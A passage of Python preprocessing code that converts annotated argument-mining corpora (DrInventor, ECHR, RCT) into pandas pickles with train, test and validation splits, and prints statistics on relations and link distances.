raise Exception('MORE RELATION FOR THE SAME PROPOSITIONS: document ' + file_name)
relation_type = link_type
relation1to2 = True
elif link[0] == targetID and link[1] == sourceID:
relation_type = "inv_" + link_type
dataframe_row = {'text_ID': str(i) + "_" + str(par),
'rawtext': paragraphs[par],
'source_proposition': propositions[sourceID][0],
'source_ID': str(i) + "_" + str(par) + "_" + str(sourceID),
'target_proposition': propositions[targetID][0],
'target_ID': str(i) + "_" + str(par) + "_" + str(targetID),
'source_type': type1,
'target_type': type2,
'relation_type': relation_type,
'source_to_target': relation1to2,
'set': split
}
if split == 'validation':
validation_list.append(dataframe_row)
if relation_type not in val_rel_counter.keys():
val_rel_counter[relation_type] = 0
val_rel_counter[relation_type] += 1
else:
normal_list.append(dataframe_row)
if relation_type not in rel_counter.keys():
rel_counter[relation_type] = 0
rel_counter[relation_type] += 1
if split == 'validation':
if type1 not in val_prop_counter.keys():
val_prop_counter[type1] = 0
val_prop_counter[type1] += 1
else:
if type1 not in prop_counter.keys():
prop_counter[type1] = 0
prop_counter[type1] += 1
pickles_path = os.path.join(dataset_path, 'pickles', dataset_version)
if not os.path.exists(pickles_path):
os.makedirs(pickles_path)
if len(normal_list) > 0:
dataframe = pandas.DataFrame(normal_list)
dataframe = dataframe[['text_ID',
'rawtext',
'source_proposition',
'source_ID',
'target_proposition',
'target_ID',
'source_type',
'target_type',
'relation_type',
'source_to_target',
'set']]
dataframe_path = os.path.join(pickles_path, dataset_type + ".pkl")
dataframe.to_pickle(dataframe_path)
if len(validation_list) > 0:
dataframe = pandas.DataFrame(validation_list)
dataframe = dataframe[['text_ID',
'rawtext',
'source_proposition',
'source_ID',
'target_proposition',
'target_ID',
'source_type',
'target_type',
'relation_type',
'source_to_target',
'set']]
dataframe_path = os.path.join(pickles_path, 'validation' + ".pkl")
dataframe.to_pickle(dataframe_path)
print("_______________")
print(dataset_type)
print(prop_counter)
print(rel_counter)
print("_______________")
print("VALIDATION")
print(val_prop_counter)
print(val_rel_counter)
print("_______________")
def create_inv_pickle(dataset_path, dataset_version, documents_path,
asymmetric_link_types, symmetric_link_types, s_non_link_types,
test=0.3, validation=0.14, maxdistance=50,
reflexive=False):
"""
Creates a pickle for the DrInventor Corpus. The sections are considered as documents, therefore no links are allowed
in different sections (but they are still logged). The "parts_of_same" links are exploited to create new links between
components and different part of the same component: if T1 and T2 are linked as parts_of_same (the direction doesn't
matter), and T1 is linked to T3, then also T2 is linked to T3 (same type of relation and same direction). A maximum
distance between the links can be enforced.
:param dataset_path: the working directory for the RCT dataset
:param dataset_version: the name of the specific sub-dataset in exam
:param documents_path: the path of the .ann and .txt file repository (regardless of the version)
:param asymmetric_link_types: list of links that are asymmetric. For these, the "inv_..." non-links will be created
:param symmetric_link_types: list of links that are symmetric. For these, 2 links rows will be created
:param s_non_link_types: list of the symmetric relations that are not links. They will be treated as "non-links"
:param maxdistance: number of maximum argumentative distance to be taken into account for links. A value <=0
means no limits
:param reflexive: whether reflexive links should be added
:return: None
"""
for key in sorted(locals().keys()):
print(str(key) + ":\t" + str(locals()[key]))
assert (validation >= 0 and validation <= 1)
assert (test >= 0 and test <= 1)
relation_types = []
relation_types.extend(asymmetric_link_types)
relation_types.extend(symmetric_link_types)
relation_types.extend(s_non_link_types)
argumentative_relation_types = ('semantically_same', 'supports', 'contradicts')
row_list = {"train":[], "test":[], "validation":[]}
rel_count = {"train":{}, "test":{}, "validation":{}}
prop_count = {"train":{}, "test":{}, "validation":{}}
link_count = {"train":0, "test":0, "validation":0}
documents_paths_list = []
documents_names_list = os.listdir(documents_path)
for document_name in documents_names_list:
documents_paths_list.append(os.path.join(documents_path, document_name))
del documents_names_list
print(str(len(documents_paths_list)) + " documents found for " + documents_path)
for document_path in documents_paths_list:
document_name = os.path.basename(document_path)
if ".ann" not in document_name:
continue
doc_ID = int(document_name.split(".")[0][1:])
raw_text_name = str(document_name.split(".")[0]) + ".txt"
raw_text_document = os.path.join(documents_path, raw_text_name)
split = "train"
if validation > 0 or test > 0:
p = random.random()
if p < validation:
split = 'validation'
elif validation < p < test + validation:
split = "test"
labels_file = open(document_path, 'r', encoding="utf-8")
text_file = open(raw_text_document, 'r', encoding="utf-8")
raw_text = text_file.read()
text_file.close()
labels_line = []
for splits in labels_file.read().split('\n'):
labels_line.append(splits)
labels_file.close()
# elaborate the offsets of the paragraphs
paragraphs_offsets = []
start = raw_text.index("<H1>", 0)
while start < len(raw_text):
try:
end = raw_text.index("<H1>", start)
except ValueError:
end = len(raw_text)
if end != start:
paragraphs_offsets.append([start, end])
start = end + 1
data = {'prop_labels': {},
'prop_offsets': {},
'T_ids': [],
'propositions': {},
'start_offsets': {}
}
for relation_type in relation_types:
data[relation_type] = []
paragraphs = split_propositions(raw_text, paragraphs_offsets)
for line in labels_line:
splits = line.split(maxsplit=4)
if len(splits) <= 0:
continue
# if it is a component label
if splits[0][0] == 'T':
T_id = int(splits[0][1:]) - 1
data['T_ids'].append(T_id)
data['prop_labels'][T_id] = splits[1]
data['prop_offsets'][T_id] = [int(splits[2]), int(splits[3])]
# each starting offset is linked to a proposition ID
data['start_offsets'][int(splits[2])] = T_id
data['propositions'][T_id] = splits[4].split('\n')[0]
# if it is a relation label
elif splits[0][0] == 'R':
source = int(splits[2][6:]) - 1
target = int(splits[3][6:]) - 1
relation = splits[1].lower()
if relation in data.keys():
data[relation].append([source, target])
# in case annotations are not made following the temporal order
# new order given by the starting offsets
new_order = {}
new_id = 0
# find the match between the starting offsets and set the new id
# for each initial offset, from lowest to highest
for offset in sorted(data['start_offsets'].keys()):
# find the corresponding ID
old_id = data['start_offsets'][offset]
# give it the lowest ID
new_order[old_id] = new_id
# increase the lowest ID to assign
new_id += 1
# adjust data to the new order
new_data = {'prop_labels': [-1] * len(data['prop_labels']),
'prop_offsets': [-1] * len(data['prop_labels']),
'propositions': [-1] * len(data['prop_labels']), }
for relation_type in relation_types:
new_data[relation_type] = []
for relation_type in relation_types:
for link in data[relation_type]:
old_source = link[0]
old_target = link[1]
new_source = new_order[old_source]
new_target = new_order[old_target]
new_data[relation_type].append([new_source, new_target])
for old_id in data['T_ids']:
new_id = new_order[old_id]
new_data['prop_labels'][new_id] = data['prop_labels'][old_id]
new_data['prop_offsets'][new_id] = data['prop_offsets'][old_id]
new_data['propositions'][new_id] = data['propositions'][old_id]
data = new_data
# TRANSITIVITY DUE OF PARTS_OF_SAME
# create the chain of parts of same
# links stored from last ID to first ID
parts_of_same = {}
for [source, target] in data["parts_of_same"]:
min = target
max = source
if source < target:
min = source
max = target
while max in parts_of_same.keys():
# found a previous relationship
middle = parts_of_same[max]
# continue down the chain to find the place of min
if min < middle:
max = middle
# min belongs between max and middle
else:
parts_of_same[max] = min
max = min
min = middle
parts_of_same[max] = min
# print(str(source) + " <-> " + str(target))
# DEBUG
# print(parts_of_same)
# all the linked parts need to indicate the same id
new_parts_of_same = {}
for idmax in sorted(parts_of_same.keys()):
idmin = parts_of_same[idmax]
if idmin in parts_of_same.keys():
idmin = parts_of_same[idmin]
parts_of_same[idmax] = idmin
new_parts_of_same[idmin] = set()
new_parts_of_same[idmin].add(idmin)
# print(parts_of_same)
# print(new_parts_of_same)
# create the sets
for idmax in parts_of_same.keys():
idmin = parts_of_same[idmax]
new_parts_of_same[idmin].add(idmax)
# index the sets from each component
for idmin in new_parts_of_same.keys():
same_set = new_parts_of_same[idmin]
for element in same_set:
parts_of_same[element] = same_set
# print(parts_of_same)
sys.stdout.flush()
# create symmetric relationships
for relation_type in relation_types:
# print("!!!!!!!!!!!!!!!")
# print(parts_of_same)
# print(relation_type)
# print(data[relation_type])
# print("-----------")
new_relations = []
for [source, target] in data[relation_type]:
if source in parts_of_same.keys() and target in parts_of_same.keys():
for same_source in parts_of_same[source]:
for same_target in parts_of_same[target]:
if [same_source, same_target] not in data[relation_type] and same_source is not same_target:
new_relations.append([same_source, same_target])
elif source in parts_of_same.keys():
for same_source in parts_of_same[source]:
if [same_source, target] not in data[relation_type] and same_source is not target:
new_relations.append([same_source, target])
elif target in parts_of_same.keys():
for same_target in parts_of_same[target]:
if [source, same_target] not in data[relation_type] and source is not same_target:
new_relations.append([source, same_target])
# print(new_relations)
data[relation_type].extend(new_relations)
# print("-------------------------------------------------------")
# sys.stdout.flush()
# exit(0)
# it is necessary to expand the
# CREATE THE PROPER DATAFRAME
propositions = data['propositions']
num_propositions = len(propositions)
assert (num_propositions >= 1)
for sourceID in range(num_propositions):
source_start = data['prop_offsets'][sourceID][0]
p_offsets = (-1, -1)
par = -1
# find the paragraph
for paragraph in range(len(paragraphs)):
p_start = paragraphs_offsets[paragraph][0]
p_end = paragraphs_offsets[paragraph][1]
if p_end >= source_start >= p_start:
p_offsets = (p_start, p_end)
par = paragraph
source_start = data['prop_offsets'][sourceID][0]
type1 = data['prop_labels'][sourceID]
for targetID in range(num_propositions):
# proposition type
type2 = data['prop_labels'][targetID]
target_start = data['prop_offsets'][targetID][0]
# relations in different paragraphs are not allowed, but we want to log them
if target_start < p_offsets[0] or target_start > p_offsets[1]:
for relation_type in relation_types:
for link in data[relation_type]:
if link[0] == sourceID and link[1] == targetID:
# find the target paragraph
par_t = -1
# find the paragraph
for paragraph in range(len(paragraphs)):
p_t_start = paragraphs_offsets[paragraph][0]
p_t_end = paragraphs_offsets[paragraph][1]
if p_t_end >= target_start >= p_t_start:
par_t = paragraph
source_prop = propositions[sourceID]
target_prop = propositions[targetID]
relation_type = relation_type
print("LINK OUTSIDE OF PARAGRAPHS!!!!")
print("source_proposition: " + propositions[sourceID])
print("source_ID: " + str(doc_ID) + "_" + str(par) + "_" + str(sourceID))
print("target_proposition: " + propositions[targetID])
print("target_ID: " + str(doc_ID) + "_" + str(par_t) + "_" + str(targetID))
print("relation: " + str(relation_type))
continue
# skip reflexive relations if they are present
if sourceID == targetID and not reflexive:
continue
# if the two propositions are too distance, they are dropped
if abs(sourceID-targetID) > maxdistance > 0:
continue
relation_label = None
relation1to2 = False
# relation type
for relation_type in argumentative_relation_types:
links = data[relation_type]
for link in links:
# DEBUG
# if not link[0][0] == link[0][1]:
# raise Exception('MORE PROPOSITIONS IN THE SAME RELATION: document ' + file_name)
if link[0] == sourceID and link[1] == targetID:
if relation_type is not None and not relation_type == relation_type:
raise Exception('MORE DIFFERENT RELATIONS FOR THE SAME COUPLE OF PROPOSITIONS:'
+ documents_path)
relation_label = relation_type
if relation_type in symmetric_link_types or relation_type in asymmetric_link_types:
relation1to2 = True
# create the symmetric or the asymmetric (inverse) relation
elif link[0] == targetID and link[1] == sourceID:
if relation_type in asymmetric_link_types:
relation_label = "inv_" + relation_type
elif relation_type in s_non_link_types:
relation_label = relation_type
elif relation_type in symmetric_link_types:
relation_label = relation_type
relation1to2 = True
dataframe_row = {'text_ID': str(doc_ID) + "_" + str(par),
'rawtext': "", #paragraphs[par],
'source_proposition': propositions[sourceID],
'source_ID': str(doc_ID) + "_" + str(par) + "_" + str(sourceID),
'target_proposition': propositions[targetID],
'target_ID': str(doc_ID) + "_" + str(par) + "_" + str(targetID),
'source_type': type1,
'target_type': type2,
'relation_type': relation_label,
'source_to_target': relation1to2,
'set': split
}
row_list[split].append(dataframe_row)
if relation_type not in rel_count[split].keys():
rel_count[split][relation_type] = 0
rel_count[split][relation_type] += 1
if relation1to2 == True:
link_count[split] += 1
if type1 not in prop_count[split].keys():
prop_count[split][type1] = 0
prop_count[split][type1] += 1
for split in ["test", "train", "validation"]:
pickles_path = os.path.join(dataset_path, 'pickles', dataset_version)
if not os.path.exists(pickles_path):
os.makedirs(pickles_path)
if len(row_list[split]) > 0:
dataframe = pandas.DataFrame(row_list[split])
dataframe = dataframe[['text_ID',
'source_proposition',
'source_ID',
'target_proposition',
'target_ID',
'source_type',
'target_type',
'relation_type',
'source_to_target',
'set']]
dataframe_path = os.path.join(pickles_path, split + ".pkl")
dataframe.to_pickle(dataframe_path)
print("_______________")
print(split)
print(prop_count[split])
print(rel_count[split])
print("links: " + str(link_count[split]))
print("_______________")
# TODO: fix the cases where the annotation includes ;
def create_ECHR_pickle(dataset_path, dataset_version, documents_path,
asymmetric_link_types, symmetric_link_types, a_non_link_types, s_non_link_types,
maxdistance=-1,
reflexive=False):
"""
:param dataset_path: the working directory for the RCT dataset
:param dataset_version: the name of the specific sub-dataset in exam
:param documents_path: the path of the .ann and .txt file repository (regardless of the version)
:param asymmetric_link_types: list of links that are asymmetric. For these, the "inv_..." non-links will be created
:param symmetric_link_types: list of links that are symmetric. For these, 2 links rows will be created
:param s_non_link_types: list of the symmetric relations that are not links. They will be treated as "non-links"
:param maxdistance: number of maximum argumentative distance to be taken into account for links. A value <=0
means no limits
:param reflexive: whether reflexive links should be added
:return: None
"""
for key in sorted(locals().keys()):
print(str(key) + ":\t" + str(locals()[key]))
relation_types = []
relation_types.extend(asymmetric_link_types)
relation_types.extend(a_non_link_types)
relation_types.extend(symmetric_link_types)
relation_types.extend(s_non_link_types)
row_list = {"train":[], "test":[], "validation":[]}
rel_count = {"train":{}, "test":{}, "validation":{}}
prop_count = {"train":{}, "test":{}, "validation":{}}
link_count = {"train":0, "test":0, "validation":0}
n_test = 0
n_val = 0
n = 0
documents_paths_list = []
documents_names_list = os.listdir(documents_path)
for document_name in documents_names_list:
documents_paths_list.append(os.path.join(documents_path, document_name))
del documents_names_list
print(str(len(documents_paths_list)) + " documents found for " + documents_path)
random.shuffle(documents_paths_list)
for document_path in documents_paths_list:
document_name = os.path.basename(document_path)
if ".ann" not in document_name:
continue
doc_ID = n
raw_text_name = document_name[:-4] + ".txt"
raw_text_document = os.path.join(documents_path, raw_text_name)
split = "train"
if n_val < 1:
split = 'validation'
n_val += 1
elif n_test < 2:
split = "test"
n_test += 1
n += 1
labels_file = open(document_path, 'r', encoding="utf-8")
text_file = open(raw_text_document, 'r', encoding="utf-8")
raw_text = text_file.read()
text_file.close()
labels_line = []
for splits in labels_file.read().split('\n'):
labels_line.append(splits)
labels_file.close()
data = {'prop_labels': {},
'prop_offsets': {},
'T_ids': [],
'propositions': {},
'start_offsets': {}
}
for relation_type in relation_types:
data[relation_type] = []
for line in labels_line:
maxsplit = 4
splits = line.split(maxsplit=maxsplit)
if len(splits) <= 0:
continue
# if it is a component label
if splits[0][0] == 'T':
T_id = int(splits[0][1:]) - 1
data['T_ids'].append(T_id)
prop_label = splits[1]
if prop_label == "major-claim":
prop_label = "claim"
data['prop_labels'][T_id] = prop_label
# in case of segmented annotation
b1 = int(splits[2])
b2 = splits[maxsplit-1]
while ";" in b2:
maxsplit += 1
splits = line.split(maxsplit=maxsplit)
b2 = splits[maxsplit-1]
data['prop_offsets'][T_id] = [b1, int(b2)]
# each starting offset is linked to a proposition ID
data['start_offsets'][int(splits[2])] = T_id
data['propositions'][T_id] = splits[4].split('\n')[0]
# if it is a relation label
elif splits[0][0] == 'R':
source = int(splits[2][6:]) - 1
target = int(splits[3][6:]) - 1
relation = splits[1]
if relation in data.keys():
data[relation].append([source, target])
# in case annotations are not made following the temporal order
# new order given by the starting offsets
new_order = {}
new_id = 0
# find the match between the starting offsets and set the new id
# for each initial offset, from lowest to highest
for offset in sorted(data['start_offsets'].keys()):
# find the corresponding ID
old_id = data['start_offsets'][offset]
# give it the lowest ID
new_order[old_id] = new_id
# increase the lowest ID to assign
new_id += 1
# adjust data to the new order
new_data = {'prop_labels': [-1] * len(data['prop_labels']),
'prop_offsets': [-1] * len(data['prop_labels']),
'propositions': [-1] * len(data['prop_labels']), }
for relation_type in relation_types:
new_data[relation_type] = []
for relation_type in relation_types:
for link in data[relation_type]:
old_source = link[0]
old_target = link[1]
new_source = new_order[old_source]
new_target = new_order[old_target]
new_data[relation_type].append([new_source, new_target])
for old_id in data['T_ids']:
new_id = new_order[old_id]
new_data['prop_labels'][new_id] = data['prop_labels'][old_id]
new_data['prop_offsets'][new_id] = data['prop_offsets'][old_id]
new_data['propositions'][new_id] = data['propositions'][old_id]
data = new_data
# CREATE THE PROPER DATAFRAME
propositions = data['propositions']
num_propositions = len(propositions)
assert (num_propositions >= 1)
for sourceID in range(num_propositions):
source_start = data['prop_offsets'][sourceID][0]
source_start = data['prop_offsets'][sourceID][0]
type1 = data['prop_labels'][sourceID]
for targetID in range(num_propositions):
# proposition type
type2 = data['prop_labels'][targetID]
target_start = data['prop_offsets'][targetID][0]
# skip reflexive relations if they are present
if sourceID == targetID and not reflexive:
continue
# if the two propositions are too distance, they are dropped
if abs(sourceID-targetID) > maxdistance > 0:
continue
relation_label = None
relation1to2 = False
# relation type
for relation_type in relation_types:
links = data[relation_type]
for link in links:
# DEBUG
# if not link[0][0] == link[0][1]:
# raise Exception('MORE PROPOSITIONS IN THE SAME RELATION: document ' + file_name)
# there is a direct relation
if link[0] == sourceID and link[1] == targetID:
if relation_label is not None and not relation_label == relation_type:
raise Exception('MORE DIFFERENT RELATIONS FOR THE SAME COUPLE OF PROPOSITIONS:'
+ document_path)
relation_label = relation_type
# there is a link
if relation_type in symmetric_link_types or relation_type in asymmetric_link_types:
relation1to2 = True
# there is an inverse relation
elif link[0] == targetID and link[1] == sourceID:
if relation_type in asymmetric_link_types or relation_type in a_non_link_types:
relation_label = "inv_" + relation_type
# symmetric relation, no link
elif relation_type in s_non_link_types:
relation_label = relation_type
# symmetric relation, no link
elif relation_type in symmetric_link_types:
relation_label = relation_type
relation1to2 = True
dataframe_row = {'text_ID': str(doc_ID),
'rawtext': "", #paragraphs[par],
'source_proposition': propositions[sourceID],
'source_ID': str(doc_ID) + "_" + str(sourceID),
'target_proposition': propositions[targetID],
'target_ID': str(doc_ID) + "_" + str(targetID),
'source_type': type1,
'target_type': type2,
'relation_type': relation_label,
'source_to_target': relation1to2,
'set': split
}
row_list[split].append(dataframe_row)
if relation_type not in rel_count[split].keys():
rel_count[split][relation_type] = 0
rel_count[split][relation_type] += 1
if relation1to2 == True:
link_count[split] += 1
if type1 not in prop_count[split].keys():
prop_count[split][type1] = 0
prop_count[split][type1] += 1
for split in ["test", "train", "validation"]:
pickles_path = os.path.join(dataset_path, 'pickles', dataset_version)
if not os.path.exists(pickles_path):
os.makedirs(pickles_path)
if len(row_list[split]) > 0:
dataframe = pandas.DataFrame(row_list[split])
dataframe = dataframe[['text_ID',
'source_proposition',
'source_ID',
'target_proposition',
'target_ID',
'source_type',
'target_type',
'relation_type',
'source_to_target',
'set']]
dataframe_path = os.path.join(pickles_path, split + ".pkl")
dataframe.to_pickle(dataframe_path)
print("_______________")
print(split)
print(prop_count[split])
print(rel_count[split])
print("links: " + str(link_count[split]))
print("_______________")
def create_RCT_pickle(dataset_path, dataset_version, documents_path,
asymmetric_link_types, symmetric_link_types, reflexive):
"""
Creates a pickle for each split of the specific version of the RCT dataset. IMPORTANT: if "PARTIAL-ATTACK" is not
in the link list, they will be converted to "attack". MajorClaim will be converted to Claim.
:param dataset_path: the working directory for the RCT dataset
:param dataset_version: the name of the specific sub-dataset in exam
:param documents_path: the path of the .ann and .txt file repository (regardless of the version)
:param asymmetric_link_types: list of links that are asymmetric. For these, the "inv_..." non-links will be created
:param symmetric_link_types: list of links that are symmetric. For these, 2 links rows will be created
:param reflexive: whether reflexive links should be added
:return: None
"""
link_types = []
link_types.extend(asymmetric_link_types)
link_types.extend(symmetric_link_types)
for split in ["train", "test", "validation"]:
row_list = []
rel_count = {}
prop_count = {}
link_count = 0
splitname = split
if split == "validation":
splitname = "dev"
split_documents_path = os.path.join(documents_path, "" + dataset_version + "_" + splitname)
# if this split does not exists, skip to the next
if not os.path.exists(split_documents_path):
continue
documents_names_list = os.listdir(split_documents_path)
documents_paths_list = []
for document_name in documents_names_list:
documents_paths_list.append(os.path.join(split_documents_path, document_name))
del documents_names_list
print(str(len(documents_paths_list)) + " documents found for " + dataset_version + ", " + split)
for document_path in documents_paths_list:
# in case of subfolders, add their content to the document list
if os.path.isdir(document_path):
new_list = os.listdir(document_path)
for name in new_list:
documents_paths_list.append(os.path.join(document_path, name))
print("More documents: " + str(len(documents_paths_list)) + " documents found for "
+ dataset_version + ", " + split)
continue
document_name = os.path.basename(document_path)
if ".ann" not in document_name:
continue
i = int(document_name.split(".")[0])
labels_file = open(document_path, 'r')
labels_line = []
for splits in labels_file.read().split('\n'):
labels_line.append(splits)
labels_file.close()
data = {'prop_labels': {},
'prop_offsets': {},
'T_ids': [],
'propositions': {},
'start_offsets': {}
}
for link_type in link_types:
data[link_type] = []
for line in labels_line:
splits = line.split(maxsplit=4)
if len(splits) <= 0:
continue
# if it is a component label
if splits[0][0] == 'T':
T_id = int(splits[0][1:]) - 1
data['T_ids'].append(T_id)
data['prop_labels'][T_id] = splits[1]
data['prop_offsets'][T_id] = [int(splits[2]), int(splits[3])]
# each starting offset is linked to a proposition ID
data['start_offsets'][int(splits[2])] = T_id
data['propositions'][T_id] = splits[4].split('\n')[0]
# if it is a relation label
elif splits[0][0] == 'R':
source = int(splits[2][6:]) - 1
target = int(splits[3][6:]) - 1
relation = splits[1].lower()
# to correct the ambiguity in the labelling
if relation == "supports":
relation = "support"
elif relation == "attacks":
relation = "attack"
# if the "partial-attack" category is not considered, they are treated as attacks
if relation == "partial-attack" and relation not in data.keys():
relation = "attack"
data[relation].append([source, target])
# in case annotations are not made following the temporal order
# new order given by the starting offsets
new_order = {}
new_id = 0
# find the match between the starting offsets and set the new id
# for each initial offset, from lowest to highest
for offset in sorted(data['start_offsets'].keys()):
# find the corresponding ID
old_id = data['start_offsets'][offset]
# give it the lowest ID
new_order[old_id] = new_id
# increase the lowest ID to assign
new_id += 1
# adjust data to the new order
new_data = {'prop_labels': [-1] * len(data['prop_labels']),
'prop_offsets': [-1] * len(data['prop_labels']),
'propositions': [-1] * len(data['prop_labels']), }
for link_type in link_types:
new_data[link_type] = []
for link_type in link_types:
for link in data[link_type]:
old_source = link[0]
old_target = link[1]
new_source = new_order[old_source]
new_target = new_order[old_target]
new_data[link_type].append([new_source, new_target])
for old_id in data['T_ids']:
new_id = new_order[old_id]
new_data['prop_labels'][new_id] = data['prop_labels'][old_id]
new_data['prop_offsets'][new_id] = data['prop_offsets'][old_id]
new_data['propositions'][new_id] = data['propositions'][old_id]
data = new_data
# CREATE THE PROPER DATAFRAME
propositions = data['propositions']
num_propositions = len(propositions)
assert (num_propositions >= 1)
for sourceID in range(num_propositions):
source_start = data['prop_offsets'][sourceID][0]
type1 = data['prop_labels'][sourceID]
if type1 == "MajorClaim":
type1 = "Claim"
for targetID in range(num_propositions):
# proposition type
type2 = data['prop_labels'][targetID]
if type2 == "MajorClaim":
type2 = "Claim"
target_start = data['prop_offsets'][targetID][0]
# skip reflexive relations if they are present
if sourceID == targetID and not reflexive:
continue
relation_type = None
relation1to2 = False
# relation type
for link_type in link_types:
links = data[link_type]
for link in links:
# DEBUG
# if not link[0][0] == link[0][1]:
# raise Exception('MORE PROPOSITIONS IN THE SAME RELATION: document ' + file_name)
if link[0] == sourceID and link[1] == targetID:
if relation_type is not None and not relation_type == link_type:
raise Exception('MORE DIFFERENT RELATIONS FOR THE SAME COUPLE OF PROPOSITIONS:'
+ documents_path)
relation_type = link_type
relation1to2 = True
# create the symmetric or the asymmetric (inverse) relation
elif link[0] == targetID and link[1] == sourceID:
if link_type in asymmetric_link_types:
relation_type = "inv_" + link_type
elif link_type in symmetric_link_types:
relation_type = link_type
relation1to2 = True
dataframe_row = {'text_ID': str(i),
'source_proposition': propositions[sourceID],
'source_ID': str(i) + "_" + str(sourceID),
'target_proposition': propositions[targetID],
'target_ID': str(i) + "_" + str(targetID),
'source_type': type1,
'target_type': type2,
'relation_type': relation_type,
'source_to_target': relation1to2,
'set': split
}
row_list.append(dataframe_row)
if relation_type not in rel_count.keys():
rel_count[relation_type] = 0
rel_count[relation_type] += 1
if relation1to2 == True:
link_count += 1
if type1 not in prop_count.keys():
prop_count[type1] = 0
prop_count[type1] += 1
i += 1
pickles_path = os.path.join(dataset_path, 'pickles', dataset_version)
if not os.path.exists(pickles_path):
os.makedirs(pickles_path)
if len(row_list) > 0:
dataframe = pandas.DataFrame(row_list)
dataframe = dataframe[['text_ID',
'source_proposition',
'source_ID',
'target_proposition',
'target_ID',
'source_type',
'target_type',
'relation_type',
'source_to_target',
'set']]
dataframe_path = os.path.join(pickles_path, split + ".pkl")
dataframe.to_pickle(dataframe_path)
print("_______________")
print(split)
print(prop_count)
print(rel_count)
print("links: " + str(link_count))
print("_______________")
def print_dataframe_details(dataframe_path):
df = pandas.read_pickle(dataframe_path)
print()
print('total relations')
print(len(df))
print()
column = 'source_to_target'
print(df[column].value_counts())
print()
column = 'relation_type'
print(df[column].value_counts())
print()
column = 'text_ID'
print(column)
print(len(df[column].drop_duplicates()))
print()
column = 'source_ID'
print(column)
print(len(df[column].drop_duplicates()))
print()
df1 = df[['source_ID', 'source_type']]
column = 'source_type'
df2 = df1.drop_duplicates()
print(len(df2))
print(df2[column].value_counts())
def create_total_dataframe(pickles_path):
"""
Given a path with train, test, and/or validation dataframes, merge them together in a total dataframe
:param pickles_path:
:return:
"""
frames = []
for split in ["train", "test", "validation"]:
dataframe_path = os.path.join(pickles_path, split + ".pkl")
if os.path.exists(dataframe_path):
df1 = pandas.read_pickle(dataframe_path)
frames.append(df1)
if len(frames) > 0:
dataframe = pandas.concat(frames).sort_values('source_ID')
dataframe_path = os.path.join(pickles_path, 'total.pkl')
dataframe.to_pickle(dataframe_path)
def create_collective_version_dataframe(pickle_path, split):
"""
Given a path containing a set of "dataset version" folders, with dataframes, merge together all the ones from the
same split
:param pickle_path:
:param split: One between "train", "test", "validation", or "total"
:return:
"""
frames = []
for path in os.listdir(pickle_path):
if os.path.isdir(os.path.join(pickle_path, path)):
dataframe_path = os.path.join(pickle_path, path, split + ".pkl")
if os.path.exists(dataframe_path):
df1 = pandas.read_pickle(dataframe_path)
frames.append(df1)
if len(frames) > 0:
dataframe = pandas.concat(frames).sort_values('source_ID')
dataframe_path = os.path.join(pickle_path, split + ".pkl")
dataframe.to_pickle(dataframe_path)
def print_distance_analysis(pickles_path):
for split in ['total', 'train', 'test', 'validation']:
print(split)
dataframe_path = os.path.join(pickles_path, split + '.pkl')
if os.path.exists(dataframe_path):
df = pandas.read_pickle(dataframe_path)
diff_l = {}
diff_nl = {}
highest = 0
lowest = 0
for index, row in df.iterrows():
s_index = int(row['source_ID'].split('_')[-1])
t_index = int(row['target_ID'].split('_')[-1])
difference = (s_index - t_index)
if highest < difference:
highest = difference
if lowest > difference:
lowest = difference
if row['source_to_target']:
voc = diff_l
else:
voc = diff_nl
if difference in voc.keys():
voc[difference] += 1
else:
voc[difference] = 1
print()
print()
print(split)
print("distance\tnot links\tlinks")
for key in range(lowest, highest + 1):
if key not in diff_nl.keys():
diff_nl[key] = 0
if key not in diff_l.keys():
diff_l[key] = 0
print(str(key) + "\t" + str(diff_nl[key]) + '\t' + str(diff_l[key]))
sys.stdout.flush()
def routine_RCT_corpus():
"""
Creates pickles for the RCT corpus. For each dataset version, creates a specific pickle file.
It creates also a collective pickle file with all the previous versions mixed together.
:return:
"""
a_link_types = ['support', 'attack']
s_link_types = []
dataset_name = "RCT"
i = 1
dataset_versions = ["neo", "glaucoma", "mixed"]
splits = ['total', 'train', 'test', 'validation']
dataset_path = os.path.join(os.getcwd(), 'Datasets', dataset_name)
document_path = os.path.join(os.getcwd(), 'Datasets', dataset_name, "original_data")
print("-------------------------------------------------------------")
print("DATASETS CREATION")
print("-------------------------------------------------------------")
for dataset_version in dataset_versions:
print("DATASET VERSION: " + dataset_version)
print()
create_RCT_pickle(dataset_path, dataset_version, document_path, a_link_types, s_link_types, False)
print('____________________________________________________________________________________________')
pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
create_total_dataframe(pickles_path)
print('____________________________________________________________________________________________')
for split in splits:
pickle_path = os.path.join(dataset_path, "pickles")
create_collective_version_dataframe(pickle_path, split)
print("-------------------------------------------------------------")
print("DATASETS DETAILS")
print("-------------------------------------------------------------")
pickles_path = os.path.join(dataset_path, "pickles")
print("DATASET VERSION: " + "all")
print()
for split in splits:
print('_______________________')
print(split)
dataframe_path = os.path.join(pickles_path, split + '.pkl')
if os.path.exists(dataframe_path):
print_dataframe_details(dataframe_path)
print('_______________________')
sys.stdout.flush()
print('_______________________')
print('_______________________')
print('_____________________________________________________________________')
for dataset_version in dataset_versions:
pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
print("DATASET VERSION: " + dataset_version)
print()
for split in splits:
print('_______________________')
print(split)
dataframe_path = os.path.join(pickles_path, split + '.pkl')
if os.path.exists(dataframe_path):
print_dataframe_details(dataframe_path)
print('_______________________')
sys.stdout.flush()
print('_______________________')
print('_______________________')
print('_____________________________________________________________________')
print("-------------------------------------------------------------")
print("DISTANCE ANALYSIS")
print("-------------------------------------------------------------")
pickles_path = os.path.join(dataset_path, "pickles")
print_distance_analysis(pickles_path)
for dataset_version in dataset_versions:
# distance analysis
pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
print_distance_analysis(pickles_path)
def routine_DrInventor_corpus(maxdistance=0):
# DR INVENTOR CORPUS
a_link_types = ['supports', 'contradicts']
s_link_types = ['semantically_same']
s_non_link_types = ['parts_of_same']
dataset_name = 'DrInventor'
dataset_version = 'arg' + str(maxdistance)
splits = ['total', 'train', 'test', 'validation']
dataset_path = os.path.join(os.getcwd(), 'Datasets', dataset_name)
document_path = os.path.join(os.getcwd(), 'Datasets', dataset_name, "original_data")
print("-------------------------------------------------------------")
print("DATASETS CREATION")
print("-------------------------------------------------------------")
create_inv_pickle(dataset_path, dataset_version, document_path, a_link_types, s_link_types, s_non_link_types,
maxdistance=maxdistance, reflexive=False)
print('____________________________________________________________________________________________')
pickles_path = os.path.join(dataset_path, "pickles", dataset_version)
sys.stdout.flush()
